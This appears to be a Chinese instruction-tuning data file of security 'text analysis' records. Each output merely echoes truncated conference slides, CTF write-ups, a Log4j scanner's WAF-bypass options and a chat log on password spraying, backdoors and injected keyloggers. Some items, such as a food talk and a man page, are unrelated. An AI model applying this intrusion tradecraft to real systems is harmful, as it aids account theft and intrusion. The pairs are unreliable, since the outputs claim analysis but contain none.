{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSecurity Response Center 吴 永 佳 国内SRC的漏洞趋势变化 及漏洞挖掘的一些思路分享 关于我 一名白帽子 常用ID getshell1993 曾活跃于多个第三方漏洞平台及众测平台 曾活跃于多个SRC漏洞平台 SogouSRC BaiduSRC 360SRC CainiaoSRC WifiSRC TuniuSRC MeizuSRC DouyuSRC Wooyun Xianzhi Allsec DidiSRC MobikeSRC NcfSRC SinaSRC LenovoSRC LetvSRC  国 内 S R C 的 漏 洞 趋 势 变 化 1 Past Now 传统漏洞企业自动化扫描检测越来越成熟 大型互联网企业开发人员安全意识逐步提升 SDLCRASPWAFHIDS蜜罐统一认证 传统漏洞 挖掘成本越来越高 大型互联网企业安全团队不断壮大 开发框架安全性正在逐步提升 2016年发生的两件对国内信息安全行业产生颠覆式影响的大事 2 多 关 注 那 些 容 易 被 忽 视 的 资 产 常规资产信息收集手段 如IP端口扫描同网段扫描子域名的各类收集方式及爆破等等 当然对SRC厂商子域名和IP端口变化的监控非常重要 但是这次我要介紹一些在平常测试中容易被忽略的企业资产 关于企业资产还应多关注以下重灾区 非普通用户使用的系统 企业使用的外部第三方系统和比较隐蔽的系统 企业的微信公众号/小程序 企业的支付宝生活号/小程序 APP Store 安卓市场的所有APP+内部APP 各省市分公司的自建站点  注册账号要提供这么多信息 放弃放弃关闭页面关闭浏览器再见 非个人用户使用的系统 媒体认证 卖家认证 企业认证 开发者认证 医生认证 Vip账号 作者认证 主播认证 司机认证 突破常规不走寻常路 当大家都朝着一个固定的方向去发现问题时而你却独自朝相反的方向探索往往会有惊喜 非普通用户使用的系统 部分平台审核不严很多情况下提供资料注册即可通过或简单电话验证即可通过 想办法提供各类资料注册注册公司/购买营业执照网上公开信息收集PS 注册不了的想办法获取到账号爆破/撞裤套路社工在线客服/人工客服文库/QQ群/github泄漏等 借账号/租账号/买账号在部分情况下也可以当威胁情报提交 有些账号也可以花几十块钱在某宝上或QQ群上购买 营业执照可以轻易购买 有些账号也可以通过信息泄露方式获取 柳暗花明又一村 漏洞多通过率接近100%美滋滋 18年提交的部分SRC漏洞 非普通用户注册使用系统的漏洞 企业使用的外部第三方系统和比较隐蔽的系统 有时通过网络空间资产搜索企业信息会有惊喜 如FOFASHODAN 以及各类搜索引擎 比如此类惊喜 企业使用的外部第三方系统和比较隐蔽的系统 以平安为例 企业使用的外部第三方系统和比较隐蔽的系统 以平安为例 也可以根据其证书header信息备案号等信息搜索 企业使用的外部第三方系统和比较隐蔽的系统 以平安为例 企业使用的外部第三方系统和比较隐蔽的系统 18年提交的部分SRC漏洞 第三方系统漏洞 关于国内SRC 选择大于努力系列 同个第三方厂商系统 三家SRC奖励分别是400001000450 适用大型企业SRC业务多资产复杂 关键词搜索+账号主体过滤 关注企业每个业务每个分公司对应的微信公众号 新活动新业务上线往往会有公众号消息推送 企业的微信/支付宝公众号+小程序+APP 企业的微信/支付宝公众号+小程序+APP 以平安为例 以平安为例  企业的微信/支付宝公众号+小程序+APP 企业的微信/支付宝公众号+小程序 18年提交的部分SRC漏洞公众号/小程序/APP相关漏洞 XXXX微信存储XSS打到大量cookie XXXX微信一处遍历企业信息 XXXX任意绑定账号可查看任意手机号订单信息 XXXX微信端整站订单泄露 XXXX公众号商城存在SQL注入 XXXX分公司公众号可getshell XXXX微信端越权可导致整站用户地址信息泄露 XXXX小程序XSS盲打到进入后台 XXXX微信小程序越权使用他人优惠券导致0元支付 XXXX微信端一处任意文件读取+SSRF XXXX小程序越权查看整站订单信息 XXXXAPP城支付漏洞可控制订单金额 XXXXAPP某处用户信息泄露  人 是 最 大 的 漏 洞 3 Github信息泄露监控 基于代码搜索关键字匹配域名/兄弟域名/内网域名/企业内部密码 https://github.com/0xbug/Hawkeye https://github.com/MiSecurity/x-patrol https://github.com/VKSRC/Github-Monitor  另类思路 从GitHub的账户出发通过邮箱进一步获得对应的用户名 混入内部QQ群等>提取Q", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Sandbox (pwn, 5p) Escape from this broken sandbox notice: You have to solve the warmup task first. And try to get the flag at /home/sandbox/flag We were given small [Linux binary](sandbox): ``` sandbox: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=d833f31d8d8592636906d44b40da9bcdbc0d686b, stripped ``` Based on task title and description we suspect that Warmup challenge solved previously may be part of this tasks. We verify this by run Warmup exploit against new server. As expected, exploit successfully retrieved flag from */home/warmup/flag* file. The same exploit however fails to retrieve */root/home/sandbox/flag*. We suspect that in order to solve the tasks, we need to bypass sandbox implemented by the provided binary. ### Sandbox Analysis We used Radare2 to disassemble the binary. The binary implements simple sandbox that inspects syscalls from monitored binary using ptrace. This functionality is implemented by subroutine 0x00400b50. Syscall inspection is as follows: ``` | 0x00400c3e 488d742410 lea rsi, [rsp + 0x10] ; struct user ctx | 0x00400c43 89df mov edi, ebx | 0x00400c45 e876010000 call fcn.ptrace_getregs | 0x00400c4a 488b84248800. mov rax, qword [rsp + 0x88] ; ctx.regs.orig_rax | 0x00400c52 4883f805 cmp rax, 5 ; = SYS32_open | ,=< 0x00400c56 7466 je 0x400cbe ; additional logic | | 0x00400c58 4883f801 cmp rax, 1 ; = SYS32_exit | ,==< 0x00400c5c 7467 je 0x400cc5 ; allow | || 0x00400c5e 488d50fd lea rdx, [rax - 3] | || 0x00400c62 4883fa01 cmp rdx, 1 ; in (SYS32_read, SYS32_write) | ,===< 0x00400c66 765d jbe 0x400cc5 ; allow | ||| 0x00400c68 4883f806 cmp rax, 6 ; = SYS32_close | ,====< 0x00400c6c 7457 je 0x400cc5 ; allow | |||| 0x00400c6e 4883f81b cmp rax, 0x1b ; = SYS32_alarm | ,=====< 0x00400c72 7451 je 0x400cc5 ; allow | ||||| 0x00400c74 4883f85a cmp rax, 0x5a ; = SYS32_mmap | ,======< 0x00400c78 744b je 0x400cc5 ; allow | |||||| 0x00400c7a 4883f87d c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n极棒跨次元 CTF 初赛解题报告 本队伍承诺诚信比赛比赛期间队伍之间不互相交流思路和 Flag本队伍承诺题目包 中的所有内容仅用于信息安全学习不用于任何其它恶意用途本报告均由本队伍独立完成 队伍 Nu1L 提示题目名称后面的数字为本题总分数详细评分规则请见题目包内部 ReadMe题 目不分先后顺序 SignIn-10 Flagflag{Geekpwn2016} 直接修改高度 Only a JPG-150 Flagflag{fight_on_the_stage} 解题步骤 提取 MP4 文件 SecretCode-150 Flag 解题步骤 这题用 ollvm 混淆了下写了段代码直接爆破从-2147483648 到 2147483647 都爆了一遍还 是没发现答案由于是 double 型可能有小数部分或者数字特别大范围太大爆不下去了 混淆后代码太恶心就没有继续看了 撕裂的藏宝图-150 Flagflag{g1ve_Me_Five!!} 解题步骤 题目描述 发现藏宝图找到秘密 入口http://map.geekpwn.org/entry.html 打开目标 URL 后发现都是不断跳转的站内连接直接 #wget m http://map.geekpwn.org/entry.html 有两张图片 http://map.geekpwn.org/map2_ghasdfhjlsadvbjsbfjjasd.bmp http://map.geekpwn.org/map1_asdjduhfuasjkdhakjsdhkja.bmp 都是一样的乱直觉直接用神器 StegoSolve XOR 两张图片 都是 IPC 惹的祸-150 解题步骤 消失的 Flag-250 Flag 解题步骤 逆向发现是个 kms 激活程序自带激活码{0ff1ce15-a989-479d-af46-f275c6370663}也可以 自行输入一个激活码然而并不知道题目的具体意图 Hollyhigh Image-350 Flag 解题步骤 1 随便上传一些图片发现都被禁有一些是超过最大上传大小有一些返回 nonono 一 开始摸不着头脑所以就随手弄了些更小的图片试试 2 尝试成功跳转到了 emage.geekpwn.org/showpic.html# 3 太辣眼睛了 background image看源码觉得 loadfile.php 很明显一个读文件的功能 4 一开始不知道因为啥一直有问题之后题目变了给了 loadfile1.php 是 loadfile.php 的源 码成功用 loadfile.php 读出了 upload.php 的源码 <?php $uploaddir = '/tmp/ctf/'; $uploadfile = $uploaddir. 'f_' .md5(basename($_FILES['userfile']['name'])); if ($_FILES['userfile']['size'] > 4096) { die('nonono'); } if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { var_dump($_FILES['userfile']); $command = \"/tmp/ctf/g33kpwchen \" . $uploadfile; echo $command . \"\\n\"; exec($command, $res); $width = $res[0]; $height = $res[1]; $filename = $res[2]; $url = \"/showpic.html#\".substr($filename, 21); header(\"HTTP/1.1 301 Moved Permanently\"); header (\"Location: \" . $url); } else { echo \"fail\"; } ?> 文件名是上传文件名作一次 md5 哈希感觉没什么搞点看了源码之后就确定了 是构造文件内容逆向 g33kpwchen有 tips 发现是开启了 ASLR 逆向部份 构造 P3 开头的文件 HugMe-300 Flagflag{e01eeed093cb22bb} 解题步骤 一个加了壳的swf(后来知道是doswf的壳) 先preload挂个TheMiner然后看loader的内容脱去第一层壳 反编译取出的swf发现一个坑 显示出来的hugme啥用都没有需要点击的那个hugme又没被正确加载需要自己做 修改 然后才能看见真正的按钮 接着关键的判断逻辑 然而Verify运行时才载入 于是再次脱壳TheMiner没hook loadByte", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDe Gustibus* Adventures in Hacking Taste Sandy Clark (Mouse) Erin (Edw0rd) Defcon 09 *De Gustibus Non Est Disputandem Confessions of a Foodie  Hackers in Norway (the motivation for this talk) Confessions of a Foodie  Hackers in Norway (the Motivation for this talk)  The child is the maker of the Mouse Confessions of a Foodie  Hackers in Norway (the Motivation for this talk)  The child is the maker of the Mouse  What you may expect today.  The Science  The Experiments The Science:  This is your brain on taste  Tastes Like Chicken  Commercially Prepared foods DOS your brain.  You are what you eat, literally! The Experiments:  How to taste Chocolate  Chocolate & Wine  Why the fuss over a Vinegar?  Miracle Fruit Banyuls What the Experts say: Banyuls is a grenache-based fortified wine that has been made since the thirteenth century. It was then that a physician and alchemist named Arnaud de Villeneuve discovered the method of mutage, when he figured out that the fermentation of wine could be halted by adding pure grape spirit to it, thereby leaving it sweet. Banyuls is allowed to ferment until it has about six percent alcohol, then spirit is added, raising the alcohol level to about fifteen percent. a sweet wine that is a classic companion to semi-sweet or dark chocolate. While rich and full-bodied, it is less sweet and syrupy than a typical dessert wine. It possesses a lovely garnet color and a good balanced acidity that makes it come off as more delicate than vintage port. What I say: Meh! --- That is, until you pair it with Chocolate How to taste Chocolate  Use your Eyes  Touch it  Use your Ears  Smell It  Now Put it on your tongue - It must melt, to be tasted. The steps to tasting anything (especially chocolate):  1. Put a tiny piece in your mouth, allow it to melt  2. Concentrate on mouth feel and change of flavors over time  3. Look for flavor notes: Do they change, are they combined or separate, how intense are they?  4. Do you feel bitterness, acid, astringency? ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2016 Check Point Software Technologies Ltd. PHP7 Memory Internals for Security Researchers Yannay Livneh | Security Researcher TEACHING THE NEW DOG OLD TRICKS About Me  Yannay Livneh  Security Researcher @ CheckPoint  Play w/  Networks  Embedded  Linux  Memory Corruptions  and stuff . AGENDA  Introduction  PHP Unserialize  ZVAL System  Unserialize + ZVAL => Bugs  Allocator  Bugs + Allocator => Exploit  Q.E.D. . (THIS WORLD WE LIVE IN) PHP  its interesting  Widely used  Servers rule the world  PHP-7 - future . PHP Security  Vulns vulns vulns  SQL Injection  XSS  Memory corruption?  Native functions  User input  UNSERIALIZE . Unserialize History of Insecurity  More CVEs than I can count  Object Injection (PoP)  Memory Corruptions  Generic Exploitation (@i0n1c) . Examples in the wild . PHP-7  Released in December 2015  New values (zval) system  New Memory Allocation  => previous exploitation irrelevant . Unserialize Nowadays  PHP-7  Some CVEs  Object Injection (PoP)  Memory Corruptions  No Remote Exploits . UNSERIALIZE (WHAT WE EXPLOIT) Unserialize Serialize/Unserialize Serialization $val = array( NULL, 1337, apple, array( a => 1, new stdClass(), 7331 ) ); serialize($val); Serialization a:4:{ } $val = array( NULL, 1337, apple, array( a => 1, new stdClass(), 7331 ) ); serialize($val); Serialization a:4:{i:0;N; } $val = array( NULL, 1337, apple, array( a => 1, new stdClass(), 7331 ) ); serialize($val); Serialization a:4:{i:0;N;i:1;i:1337; } $val = array( NULL, 1337, apple, array( a => 1, new stdClass(), 7331 ) ); serialize($val); Serialization a:4:{i:0;N;i:1;i:1337;i:2;s:5:apple; } $val = array( NULL, 1337, apple, array( a => 1, new stdClass(), 7331 ) ); serialize($val); Serialization a:4:{i:0;N;i:1;i:1337;i:2;s:5:apple; i:3;a:3:{ }} $val = array( NULL, 1337, apple, array( a => 1, new stdClass(), 7331 ) ); serialize($val); Serialization a:4:{i:0;N;i:1;i:1337;i:2;s:5:apple; i:3;a:3:{s:1:a;i:1; }} $val = array( NULL, 1337, apple, array( a => 1, new stdClass(), 7331 ) ); se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Writeup Defcamp CTF Quals 2016 Team: psrok1, seikendev, c7f.m0d3, cr019283, nazywam, rev, msm, akrasuski1, shalom ![](./scoreboard.png) ![](./chart.png) ### Table of contents * [F4ceb00k 60s (Web 100)](web100) * [URL Anonymizer (Web 200)](web200) * [Bad OTPxploited (RevCrypt 100)](revcrypt100) * [Rucksack (RevCrypt 200)](revcrypt200) * [Decoy (RevCrypt 300)](revcrypt300) * [dctfizer (RevCrypt 400)](revcrypt400) * [Warm heap (Exploit 100)](exp100) * [The nospecial virus (Misc 100)](misc100) * [b4s14l (Misc 150)](misc150) * [Musicetry (Misc 200)](musicetry_misc_200) * [Evil farmers (Misc 400)](misc400)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2020 4141414141414141414 AAAAAAAAAAA HITCON aaaddress1@chroot.org Reversing In Wonderland Neural Network Based Malware Detection Techniques  Master degree at CSIE, NTUST  Security Researcher - chrO.ot  Speaker - BlackHat, DEFCON, HITCON, CYBERSEC  aaaddress1@chroot.org  30cm.tw & Hao's Arsenal #Windows #Reversing #Pwn #Exploit  Associate Professor of CSIE, NTUST  Joint Associate Research Fellow of CITI, Academia Sinica  smcheng@mail.ntust.edu.tw #4G #5G #LTE_Attack #IoT aaaddress1@chroot.org 1. Malware in the Wild 2. Semantics 3. Semantic-Aware: PV-DM 4. Asm2Vec & Experiment 5. Challenge /?outline aaaddress1@chroot.org Malware In the Wild aaaddress1@chroot.org #behavior aaaddress1@chroot.org #behavior aaaddress1@chroot.org #behavior aaaddress1@chroot.org # rule silent_banker : banker { meta: description = \"malware in the wild\" threat_level = 3 in_the_wild = true strings: $a = {6A 40 68 00 30 00 00 6A 14 8D 91} $b = {8D 4D B0 2B C1 83 C0 27 59 F7 F9} $c = \"UVODFRYSIHLNWPEJXQZAKCBGMT\" condition: $a or $b or $c } YARA aaaddress1@chroot.org File Headr Opt Header PE Data $a $c +a0 +1e8 +9f7c malware.exe [detected] $b /?malware aaaddress1@chroot.org File Headr Opt Header PE Data $a $b $c +a0 +1e8 +9f7c malware.exe [detected] File Headr Opt Header PE Data (patched) malware_test#1.bin #1 \\x00\\x00.. \\x00\\x00.. detect /?malware aaaddress1@chroot.org /?malware File Headr Opt Header PE Data $a $b $c +a0 +1e8 +9f7c malware.exe [detected] File Headr Opt Header PE Data (patched) malware_test#2.bin #2 \\x00\\x00.. \\x00\\x00.. clear aaaddress1@chroot.org File Headr Opt Header PE Data $a $b $c +a0 +1e8 +9f7c malware.exe [detected] File Headr Opt Header PE Data (patched) malware_test#3.bin #3 \\x00\\x00.. \\x00\\x00.. detect /?malware aaaddress1@chroot.org #免殺 aaaddress1@chroot.org #免殺 aaaddress1@chroot.org #AMSI aaaddress1@chroot.org  Active Protection System - rule-based, not strong enough against unkown attacks  Malware Pattern based on Reversing - lack of lexical semantic of assembly  fa", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nlog4jdetect 被动检测专项被动检测脚本 安依依赖 source file: https://gist.github.com/n00BToT/5592eb2255d62660ef1553819249c238 被动代理https://github.com/qiyeboy/BaseProxy 在 https://github.com/fullhunt/log4j-scan 上面改 思路 被动扫描方式 监听流量 hook 请求方法 过滤 pngjpg 等等图片的黑名单 根据 dnslog 平台 制作 payload 根据 payload 变形 url参数post data参数 headers 发包 不足 扫描的攻击面纯依赖外部爬虫爬取的链接被动扫描 特征太明显容易被封不适合用作护网攻击行为如需用作护网攻击用则需要挂载代理 池等 usage: python3 -m pip install colorslogging requests termcolor PyCryptodome -i https://pypi.tuna.tsinghua.edu.cn/simple  Desktop python3 log4j_detect.py -h [] CVE-2021-44228 - Apache Log4j RCE Scanner [] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform. [] Secure your External Attack Surface with FullHunt.io. usage: log4j_detect.py [-h] [-d DEBUG] [-p PROXY] [--wait-time WAIT_TIME] [-- waf-bypass] [--custom-waf-bypass-payload CUSTOM_WAF_BYPASS_PAYLOAD] [--test- CVE-2021-45046] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [-- custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST] [--disable-http-redirects] options: -h, --help show this help message and exit -d DEBUG, --debug DEBUG logger debug -p PROXY, --proxy PROXY send requests through proxy --wait-time WAIT_TIME Wait time after all URLs are processed (in seconds) - [Default: 5]. --waf-bypass Extend scans with WAF bypass payloads. --custom-waf-bypass-payload CUSTOM_WAF_BYPASS_PAYLOAD Test with custom WAF bypass payload. --test-CVE-2021-45046 Test using payloads for CVE-2021-45046 (detection payloads). --dns-callback-provider DNS_CALLBACK_PROVIDER DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh]. --custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST Custom DNS Callback Host. --disable-http-redirects Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have a higher chance of reaching vulnerable systems.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nEvading next-gen AV using A.I. Hyrum Anderson hyrum@endgame.com @drhyrum /in/hyrumanderson The Promise of Machine Learning  Learn from data what constitutes malicious content or behavior  Discriminatory patterns learned automatically, not obviously constructed by hand  Generalize to never-before-seen samples and variants  so long as data used for training is representative of deployment conditions  motivated adversaries actively trying to invalidate this assumption x1 rule malware { strings: $reg = \\\\CurrentVersion\\\\Internet Settings condition: filesize < 203K and #reg > 3 } Goal: Can You Break Machine Learning?  Static machine learning model trained on millions of samples x1 Machine Learning Model score=0.75 (malicious, moderate confidence)  Simple structural changes that dont change behavior Machine(Learning( Model score=0.49 (benign, just barely)  unpack  .text -> .foo (remains valid entry point)  create .text and populate with .text from calc.exe Adversarial Examples  Machine learning models have blind spots / hallucinate (modeling error)  Depending on model and level of access, they can be straightforward to exploit  e.g., deep learning is fully differentiable (directly query what perturbation would best bypass model)  Adversarial examples can generalize across models / model types (Goodfellow 2015)  blind spots in YOUR model may also be blind spots in MY model (scaled(for(visibility) image(credit:(http://www.popsci.com/byzantine-science-deceiving-artificial-intelligence Taxonomy of Attacks Against ML  can get a score  black box  but can arbitrarily probe and get a score  score = raw output / confidence before thresholding for good/bad  has your model  architecture & weights are known  a direct attack on your model  easy for deep learning  gradient perturbation  dueling models / GAN  can get good/bad  black box  but can arbitrarily probe and get a label  label = malicious / benign  also a viable solution for traditional AV scanners An(adversary [for(Android(mal", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n调用栈 lookup:172, JndiManager (org.apache.logging.log4j.core.net) lookup:56, JndiLookup (org.apache.logging.log4j.core.lookup) lookup:221, Interpolator (org.apache.logging.log4j.core.lookup) resolveVariable:1110, StrSubstitutor (org.apache.logging.log4j.core.lookup) substitute:1033, StrSubstitutor (org.apache.logging.log4j.core.lookup) substitute:912, StrSubstitutor (org.apache.logging.log4j.core.lookup) replace:467, StrSubstitutor (org.apache.logging.log4j.core.lookup) format:132, MessagePatternConverter (org.apache.logging.log4j.core.pattern) format:38, PatternFormatter (org.apache.logging.log4j.core.pattern) toSerializable:344, PatternLayout$PatternSerializer (org.apache.logging.log4j.core.layout) toText:244, PatternLayout (org.apache.logging.log4j.core.layout) encode:229, PatternLayout (org.apache.logging.log4j.core.layout) encode:59, PatternLayout (org.apache.logging.log4j.core.layout) directEncodeEvent:197, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender) tryAppend:190, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender) append:181, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender) tryCallAppender:156, AppenderControl (org.apache.logging.log4j.core.config) callAppender0:129, AppenderControl (org.apache.logging.log4j.core.config) callAppenderPreventRecursion:120, AppenderControl (org.apache.logging.log4j.core.config) callAppender:84, AppenderControl (org.apache.logging.log4j.core.config) callAppenders:540, LoggerConfig (org.apache.logging.log4j.core.config) processLogEvent:498, LoggerConfig (org.apache.logging.log4j.core.config) log:481, LoggerConfig (org.apache.logging.log4j.core.config) log:456, LoggerConfig (org.apache.logging.log4j.core.config) log:63, DefaultReliabilityStrategy (org.apache.logging.log4j.core.config) log:161, Logger (org.apache.logging.log4j.core) tryLogMessage:2205, AbstractLogger (org.apache.logging.log4j.spi) logMessageTrackRecursion:2159, AbstractLogger (org.apache.logging.log4j.s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBypassing the secureboot and etc on NXP SOCs Yuwei ZHENG, Shaokun CAO, Yunding JIAN, Mingchuang QIN UnicornTeam, 360 Technology Defcon 26 About us  360 Technology is a leading Internet security company in China. Our core products are anti-virus security software for PC and cellphones.  UnicornTeam (https://unicorn.360.com/) was built in 2014. This is a group that focuses on the security issues in many kinds of wireless telecommunication systems.  Highlighted works of UnicornTeam include:  Low-cost GPS spoofing research (DEFCON 23)  LTE redirection attack (DEFCON 24)  Attack on power line communication (Black Hat USA 2016) Agenda  Motivation  About Secure Boot  Different implementations of secure boot  Secure boot and Anti-clone  Details of the vulnerability  Exploitation  Countermeasures Motivation  Research the Secure Boot implementation in cost- constrained systems.  Assess the anti-cloning strength of embedded SoCs.  Attempt to modify peripherals as hardware Trojan. About Secure Boot  Public key-based binary signing and verification  Signing 1) Signer generate a key pair, K-priv and K-pub(Certificate). 2) Calculate the binary images hash. 3) Encrypt the hash with K-priv, the output is Signature. 4) Attach the Certificate(K-pub) and Signature to binary image.  Verification 1) Calculate the binary images hash 2) Decrypt the Signature with K-pub (certificate), the output is the original Hash. 3) If the two hashes are equal, the Signature is valid, which means binary hasnt been modified illegally. About Secure Boot  Principle of Secure Boot  Boot ROM has been masked into the SoCs at the chip manufacturing stage, as well as the Root PuK(public key) has been permanently programmed into the OPT memory during the final product making stage. Silicon's physical mechanism ensures Root PuK and Boot Rom can not be replaced or bypassed.  Product vendor use its Root PrK(private key) to generate a signature of the Boot image and App PuK, as well as to generate a signature of the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents Glitched on Earth by Humans: A Black-Box Security Evaluation of the SpaceX Starlink User Terminal Lennert Wouters @LennertWo COSIC #BHUSA @BlackHatEvents Starlink 101 Laser link Lower Earth Orbit (LEO) Space Earth User Terminal (UT) Gateway Internet Satellite 2 This talk Source: u/darkpenguin22 Source: SpaceX Source: SpaceX #BHUSA @BlackHatEvents 3 #BHUSA @BlackHatEvents Teardowns youtube.com/c/KenKeiter @kenkeiter youtube.com/c/MikeOnSpace @mikeonspace youtube.com/c/Thesignalpath @TheSignalPath youtube.com/c/ColinOFlynn @colinoflynn danmurray.net @DanJMurray 4 olegkutkov.me @olegkutkov #BHUSA @BlackHatEvents Hardware revisions Circular UT Square UT High Performance UT  50 x 30 cm (19 x 12)  Residential and RV  rev3_proto0  rev3_proto1  rev3_proto2  57 x 51 cm (22 x 20)  Business and Maritime  hp1_proto0  hp1_proto1  59 cm (23,23) diameter  Residential  rev1_pre_production  rev1_production  rev1_proto1/2/3  rev2_proto0/1/3  rev2_proto2 (SoC cut 3)  rev2_proto4 (SoC cut 4) 5 This talk (but attack should apply to all UT hardware) Transceiver  External phased array  transceiver_rev2p0/5 #BHUSA @BlackHatEvents ethernet + power motors UART Accessible connectors on V2* UT RX UT TX JST BM10B-ZPDSS-TF(LF)(SN) JST BM05B-ZESS-TBT(LF)(SN) 6 *V1 hardware had an extra connector, V3 does not have easily accessible connectors #BHUSA @BlackHatEvents UART  U-Boot 7 (Newer firmware no longer uses this version) U-Boot does not accept serial input (on non-development/fused hardware) #BHUSA @BlackHatEvents 8 UART  Login Prompt #BHUSA @BlackHatEvents Clock generation 59 cm (23,23) 9 GPS receiver STM STA8089 GLLBLU GPS clock SoC POE PCB overview #BHUSA @BlackHatEvents  (A) Digital BeamFormer (DBF)  STM GLLBSUABBBA  Codename: SHIRAZ  (B) Front-End Module (FEM)  Codename: PULSAR(AD)  V2 hardware and up:  1 DBF  16 FEMs 10 RF Components A B #BHUSA @BlackHatEvents 11 Siliconpr0n Thanks to John McMaster! @johndmcmaster siliconpr0n.org/archive/doku.php?id=mcmaster:spacex:", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n群聊精华 2021.7.27-2021.8.1 @haya问密码喷洒的密码感觉字典是个大问题大家有不错的这种强弱口令字典吗 @wywwzjj https://github.com/r35tart/RW_Password @L.N. https://github.com/berzerk0/Probable-Wordlists https://github.com/kaonashi-passwords/Kaonashi @haya https://github.com/L-codes/pwcrack-framework @山顶洞小霸王 Windows下net accounts 命令可以查密码策略 @Astartes 密码喷洒可以被设备监控到吧基本上不到最后一步不用这个内网搜集搜集信息做个密码本加上 姓名+符合规则的弱口令剩下的看运气了 @大海问cs自带的portscan扫描一个C段段的每个ip都开启了110,25,143端口很明显不正常各 位前辈们有遇到过这种情况吗 @Breezy 25和110 我本机如果开了火绒就会扫出来 不是说 本机开了火绒我就监听到了25和110 是通过火绒出口 不管扫什么 都会有25和110端口 @Se7en问师傅们工作组环境在一个08r2上我smbexe登陆成功用的hash是8bxxx  lsass内存里 抓出来administrator的hash是0a5cxxxx(找不到8bxxx)而且这个机器抓到的有个用户的ntlm有三 个这是什么情况 @skrskrt 缓存的有可能是历史密码正常 @L.N.: 改密码了 一直没注销 关机过 @路人甲问师傅们请问有无linux下比较好用的后门主要是要简单安全还有持续化 @tomato答 pupy @大海问各位师傅你们好晚辈请教一个概念问题书中(c primer plus) 里说:ANSWER和try都是指 针我的疑问: ANSWER 不是常量吗 try字符串吗 指针的申明不应该是 *吗 为什么说 ANSWER和try都是指针 No. 1 / 3 @Astartes ANSWER 近似于 static const char* ANSWER = \"Grant\"; 你进去调调就知道了预处理的时候 define 定义的就都被替换了 @skrtskrt #define ANSWER \"Grant\" 近似于 static const char* ANSWER = \"Grant\"; @L.N. 以前学c到指针的时候老是搞不懂后来学了内存相关知识很多一下子就明白了建议学指针 之前可以看点内存相关知识我看的是深入理解 c指针 @Hanamaki 1.用!=比较两个字符串是比较首地址 2.数组名大多数时候隐式转换成指向首元素的指针类型右值 @任我飞渡问各位大佬windows 有没有能跨用户session下键盘钩子的办法 L.N.答 CS是注入到指定用户的explorer.exe然后开启键盘记录 @任我飞度 搞定了注入进程被杀写个目标用户启动的计划任务 @B1ngDa0 搞个system权限的就可以注入system注入目标用户 @skrtskrt dll 也可以做键盘记录用rundll 32 去启而且不一定要用钩子 @山顶小霸王 dll还是exe还有用什么去启跟键盘记录没啥必然的联系吧 或者你想表达的是可信的进程去启动 @skrtskrt 对https://blog.csdn.net/zhou191954/article/details/43309707 No. 2 / 3 @Patrilic https://blog.csdn.net/sinat_24229853/article/details/47046581 @lengyi https://eyeofrablog.wordpress.com/2017/06/11/windows-keylogger-part-1-attack-on-user-la nd/ No. 3 / 3", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" t .TH \"VCONSOLE\\&.CONF\" \"5\" \"\" \"systemd 231\" \"vconsole.conf\" .\\\" ----------------------------------------------------------------- .\\\" * Define some portability stuff .\\\" ----------------------------------------------------------------- .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .\\\" http://bugs.debian.org/507673 .\\\" http://lists.gnu.org/archive/html/groff/2009-02/msg00013.html .\\\" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .ie \\n(.g .ds Aq \\(aq .el .ds Aq ' .\\\" ----------------------------------------------------------------- .\\\" * set default formatting .\\\" ----------------------------------------------------------------- .\\\" disable hyphenation .nh .\\\" disable justification (adjust text to left margin only) .ad l .\\\" ----------------------------------------------------------------- .\\\" * MAIN CONTENT STARTS HERE * .\\\" ----------------------------------------------------------------- .SH \"NAME\" vconsole.conf \\- 虚拟控制台配置文件 .SH \"SYNOPSIS\" .PP /etc/vconsole\\&.conf .SH \"描述\" .PP /etc/vconsole\\&.conf 文件被 \\fBsystemd-vconsole-setup.service\\fR(8) 用于配置虚拟控制台的 键盘映射与字体 .PP vconsole\\&.conf 文件的基本格式是一系列换行符分隔的 VAR=VALUE 行(每行一个变量) 可以直接嵌入到 shell 脚本中使用 